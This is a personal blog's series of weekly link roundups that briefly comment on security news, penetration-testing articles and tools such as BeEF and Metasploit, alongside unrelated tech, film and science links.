Security

Just some security things that I’ve found interesting (read: they rocked)..

5 Minutes with the Packetloop Beta – The Packetloop presentation at Ruxcon last year was one of the highlights for me, Michael Baker did a really good job of demonstrating (even last Nov) utilising compute clusters to analyse and give the security defender a heads up of large data sets. This video is a really good look at the UI and yeah, it combines a bunch of stuff I enjoy, especially visualisation, and large-data-set analysis. (Phew, got through that without saying cloud or big data!)

Android Application Assessment – A fairly extensive walkthrough of performing an app assessment against apps on Android. Nuff said.

Rubygems Site Recovers from Compromise – I’m a little slow in posting about this, but the community driven rubygems site suffered a breach due to the recent Ruby YAML issues that surfaced a couple of weeks ago. Apart from the article, I actually found their incident response process of shifting their ‘working’ log to gdocs (check it here).

How do I phish? – @Zeknox‘s (Brandon McCann) writes up a fairly in-depth look into how he performs phishing campaigns as part of penetration testing exercises. A good one to bookmark for when you need to perform these sorts of assessments yourself. (Thanks again to Rob Fuller for this).

Bill Shocker – hits 600,000+ Android phones! (Exclamationpoints). (In China only?) From what the article seems to be stating is that this malware turns the phones into a botnet of phones, although currently it appears to be using them for sending SMS’ at the profit of the attackers.

Non-Security

… and then a bunch more non-security stuff …

It’s All Academic – Andy Budd writes up a great article on the disjoint between academics and those working in the web industry. The ‘paraphrased’ conversation is great, and something that I found very odd when I shifted from academics into the industry.

The larger our past gets the smaller our present feels – A great short film that Kottke posted the other day. Great style, and, interesting message about time, and our perception of time as we age. This is certainly something I’m starting to perceive as I get older, and things get more and more difficult.

Valve & JJ Abrams Working on a Movie – I’m a gamer, well, when I have time (which, this year is looking very unlikely), and this news is fairly interesting .. but .. the cynic in me is sort of assuming it’s just gonna suck.

Mockumentary on Physically Unlikely Amusement Park Rides – .. this .. this was fantastic. I really enjoyed the style, the scientist, the ridiculous rides, and how it starts off and is ‘almost’ realistic, but then just plummets into the ‘wtf’. It sort of made me think of Cube.

Security articles I flagged (for fun or .. whatnot):

Are You Practicing Safe Coding? – Personally I have a love/hate relationship with these style of infographics, this one in particular is almost like a flattened marketing/slidedeck. Eh. Anyway, this image does hold a lot of stats in a single place, and does have a fairly open call to action to check out the rest of Veracode’s stuff. (Oh, and don’t forget that infographics are ruining the web).

HowTo: Extract ‘hidden’ API-hooking BHO DLLs – Ever had a chance to play with Volatility? If you haven’t definitely check it out. Great way to analyse volatile memory. This tute walks through trying to find a malicious browser helper object hooked into IE performing some nasty mitb stuff.

Turn a Bra Underwire into a Lock Pick – Need I say more? This is a security article AND an awesome party trick!

10 Evil User Tricks for Bypassing AV – Thanks to @mubix‘s #sharedlinks.

Cross Device Attacks using Cloud Sync (iCloud example) – Nitesh writes up another Apple-esque security article. This time looking at how whilst iOS is generally considered a secure platform, when you introduce syncing applications you introduce a weaker link in the chain, namely, a desktop computer. This is compounded when you’re using syncing applications for business processes, which are also then synced to your crappy out of date home PC. All this and more! (read the article ya slackers).

Hacker Blackmailed 350 Women into Stripping on their Webcams – .. Social engineering .. what can’t it do?

Security flaws in UPnP – millions at risk – When the R7 guys aren’t making MSF kick ass, they do security research. This is unlikely the first time you’ve heard about this issue as it’s done the rounds lately. I’m aware they offer some self-test tools now too if you want to check if you’re vulnerable.

.. The rest of these are not so security focused (but .. sort of..).

Awesome secret drawer – Watch the embedded Vimeo – this wooden chest with the hidden drawer is fantastic.

Poor Sleep Prevents Brain from Storing Memories – I have a pretty shocking memory. Sometimes I don’t sleep too well. I’m not really convinced in my case these issues are related.. but, interesting research regardless.

Eddie Adams’ Pulitzer Winning Image – This well known (and super powerful) photo from Feb 1st 1968, Vietnam. There’s not many art forms where the power of your creation is something which even you as the creator can’t bear to face. Interesting insight into the image and the impact it had on society and the photographer.

MS embracing (Open Source) Git – I found the MS article provided a much clearer picture of their intents, and their approach to open source software, especially compared to the original article.

Written to the sweet relaxing sounds of the new Villagers album, Awayland (for those indie fans). I know I’m a bit late on my ‘attempt to post every Friday’ post thing, but, Friday turned into a bit of a clusterfudge, so excuse the delay (plus, Australia day over the weekend <insert dranks>).

Security articles that caught my attention:

Actually, I really was a criminal.. – I found Rich’s post really insightful and refreshing. I also think it’s a fairly common occurrence for those involved in the info sec space to have done similar things themselves, just, not as common for those people to publicly post about it. Kudos.

Android Botnet Infects 1 Million Plus Phones – I didn’t read too much into the ‘extremist’ title of this post, but, I don’t think that this sort of thing should be too surprising to security peeps. Phones are just computers right? And as they continue to grow in popularity and drop in price, well, of course malicious actors are going to focus their attention on them. I know a personal interest of mine is in using BeEF to target mobile devices, in this way, you could effectively coerce untold number of devices to perform actions on your behalf just through their browser.

Pen tester launches infosec bootcamp – I’m glad to have worked with, and hung out with, Snyff on a few occasions, and I’ve really gotten a lot out of his PentesterLab for quite some time, and now that he’s making more of a move to make this material available this is only a good thing. Another one of Snyff’s ‘free’ services is the PNTSTR Bot. His bot sends me a ‘pen tester’ question once a week via a DM. It’s a great little ‘test yourself’ activity that takes less than 30 seconds, and, I look forward to the challenge every week.

Movie filmed entirely in Disney Theme park – Not strictly a digital security post, but, I certainly found the concept really interesting. The crew and actors pretty much had to ‘stealth’ film the movie, referring to mobile phones for notes and scripts, and using as discrete camera setups as possible. I hope this inspires more of these sorts of things.

Application Framework Security – Jerry Hoff over at OWASP has started a new Project to document the security controls available in common development frameworks. It’s a good reference (if just at the beginning), and hopefully it can be extended to integrate and interlink with other OWASP projects like the T10, ASVS, etc.

Some tech/dev stuff:

Visual Event – for when you need to dig into JS events. Hat tips to Vitaly for the link.

LICEcap – for when you need to capture a portion of your screen and immediately convert it into an animated GIF. .. obviously for .. you know .. legitimate reasons.

MS Going its own way on Audio/Video spec – .. god damnit WHY does this shit happen? Just when you think browsers are starting to all meet at an apex of compatibility *bam* – we’re going to do our own thing. I really dislike IE, mainly because of the experience and bloat of it, but, there’s all this underlying gumpf that, when I think about it, also grinds my gears. (Goes back to rocking backwards and forwards on his angry man chair).

Firefox Phone – I’ve seen a few presentations on the Boot to Gecko (BTG) / Firefox OS over the past 12 months. Primarily at OWASP events. And I’ve been interested in the ‘everything is a web app’ phone (a little bit like Chrome OS), except, in this case, everything is HTML and JS. Obviously from a BeEF point of view I was salivating, but, from a new player in the space, I’m also keen to see how it goes. Plus, obviously, being completely customisable.

Motivational / inspirational (?):

Putting Things Into Perspective: Space – I was enthralled by the entire 19 minute vimeo, and it was one of those moments (that you may not experience that often) when you realise just how small we all are, and how profound it must be to a) see the entire earth under you and b) see the sun surrounded by the darkness of space, as opposed to the blue sky we normally associate with the sun.

First off the bat is a couple of posts that I’ve had direct (some would say intimate) involvement.

BeEF QR Fun – Summarising some of the salient points from my OWASP AppSecAPAC 2012 presentation (Shake Hooves with BeEF), I finally pulled my finger out and posted for the BeEF blog. Mainly focusing on custom mount points in BeEF with iFrame target-site impersonation, plus a dabbling of QR-codedness, the post hopes to demonstrate a few different methods to fit BeEF into your social engineering methodology.

Anonymous Post-Compromise Control via Tor Hidden Services – My colleague Dave somehow managed to wrangle up an opus on utilising Tor to anonymise backdoor connectivity to compromised hosts over the Christmas period. Knowing Dave’s relationship with beer I’m surprised that he still had the brain power to push this out (:P). If you have any interest in Metasploit and Tor then you should check out his post.

And now onto other security stuff..

Minion – Automating Security for Developers – There are a few different open source security automation projects going on at the moment (I mentioned Codesake recently), but this one looks pretty interesting. It seems to be fairly modular (currently appears to interface with ZAP, Skipfish and Garmr. The demo video seems really interesting, very point and click. For developers, this may be an ideal ‘step’ in their SDLC to catch bugs sooner.

Red October – There’s been quite a bit of noise about this attack recently. This was one of the first blog posts I read that seemed to provide a clear summary, with further links into the Kaspersky reports. This long-term campaign has apparently been targeting embassies and other governmental agencies (including defence) for the past 5 years.

Non-Negotiable Elements of a Secure Software Development Process: Part 2 – Nick Coblentz has been posting these great articles on elements of a secure systems or software development lifecycle which are non-negotiable. Part 1 started with security requirements, while this post is focused on security architecture, configuration and other patterns. If you’re working on embedding security into your development lifecycle definitely keep in the loop on Nick’s posts.

Man-in-the-Middle Attacks Against Browser Encryption – Schneier recently posted a summary of how Nokia are intercepting HTTPS channels to offer better data transmission speeds over slower networks through compression and other means. This is really similar to a 2009 post of mine talking about how Opera Mini was doing the same thing.

Defeating AES Without a PhD – Dan Crowley writes up an excellent post on leveraging some of Burp’s more tricky intruder settings to understand (and attack) encrypted parameters within web apps. (Dan’s a great guy, was happy to have a few beers with him while he was down in Sydney last year).

Bouncer’s Laser Precision Phishing – RSA have posted an article on a particular phishing kit (i.e. pre-canned tool used to create or implement phishing sites) which utilises unique URL links for each recipient (so this kit includes the email/spam component too) to ensure that the site is only accessible (at least initially) by the victim. I’m sure there are ways to bypass this, but, it certainly may fool some simple phishing detection tools (such as used by finance or other sectors when they analysis abuse mailboxes or email bounce backs etc).

Okay, enough with the security stuff .. (Fine! .. here’s one article..)

Monkey Island Insult Swordfighter in your Browser – for those fans of the original Monkey Island point and click adventure games you should check this out! This guy has dumped in browser form a collection of the sword-fighting challenges..

Pretty hectic week, what, with Rails getting an absolute slam, Java oh-days and CES going on. If you’ve been bored on the Internet you’ve been doing it wrong.

AWS Improvements – so my IaaS-of-choice is primarily Amazon, and it’s no surprise that they’ve had some updates since the start of the year. In fact, they seem to be posting about updates on an almost weekly basis. This update, whilst primarily aesthetic, brought with it a new Android app. I’ve only had a brief play with it, but, it certainly gives a basic portable access into managing your virtual machines. In addition to this, AWS also updated CloudWatch to allow for automatic stopping of idle machines. I’ve been hacking together some stuff to perform this same task, so, it’s useful to see that they’re providing it natively. Another reason to shift from Heroku to Amazon

The Value of Concentration in the Digital Age – I originally saw this article on Lifehacker, and found that a lot of the issues discussed felt very familiar. Whilst the post primarily focuses on the impacts of lack of concentration, and how traditional books can help with this (you can’t click buttons on a book), the commentary around associated anxiety is something I certainly agree with. I’ve struggled on and off with anxiety for a while now and certainly put a high value on ‘relaxing’ and ‘unwinding’ to help manage this. Books are a great source of relaxation for me, and this article certainly confirmed for me the benefits of using a fairly dumb ereader (the basic basic Kindle) as opposed to something like an iPad. The Kindle does one thing and one thing well.

Colour Affects Perceptions of Taste – from the design/hive-mind of Core77, a quick summary of some research performed by the Society of Sensory Professionals on how the colours of containers affects the taste. For all the clever shit we, as humans, think we’re capable of, there’s certainly a whole bunch of unknowns within our minds.

The Dronenet – but, instead of being used for evil, we’re actually going to use things little critters for good. Who would’ve thought? Apart from really enjoying the vids of the quadrocopters bouncing balls, and being horrified of all the invasion-of-privacy stories coming out, there’s not too much *positive* stuff that comes out around drones. I found this idea somewhat refreshing. .. As an aside, I’m obviously in the wrong circles, as mostly when I read about drones it’s negative, when of course there are in fact a lot of benefits of this sort of tech too.

The Pixel Trade – Really interesting photography project whereby the author is travelling the globe trading his photography skills for accommodation, food, travel etc. I’m quite glad that this sort of exercise is being done by people, and, I sort of wish that I could convert what I do into a similar process… Anyone want to fly me around and hook me up with a couch for security services? People keep on saying I have Penetration Testing skills on LinkedIn .. surely someone finds those skills useful?

Onto the security stuff:

Patch your Rails stuff – The R7 guys have been posting a lot about this issue, which is pretty darn wide. Just read their posts, and, if you’re not following them on twitter/RSS, get onto it.

Patch your Java – This is being actively exploited in the wild, and, if it’s not in MSF now, it will be shortly.

Realtime iOS Filesystem Monitoring – @Jhaddix has been posting some really good iOS stuff over the past few days. If you don’t follow his blog or twitter get onto it. (He just posted Defeating iOS Jailbreak Detection too!)

Q1 Security Projects – Daniel Kennedy over at 451 Research posted some pretty graphs showing the various states of security projects from a sub-set of organisations. I haven’t really looked too closely at the data sources or rigour within, but, it might be a quick and easy way for you to gauge where you are at with your projects compared to ‘some’ sectors.

ENISA BYOD Guide – I won’t really add much to what @rmogull wrote – but, if you’re at all working on BYOD in your companies, this is a pretty good set of information for you.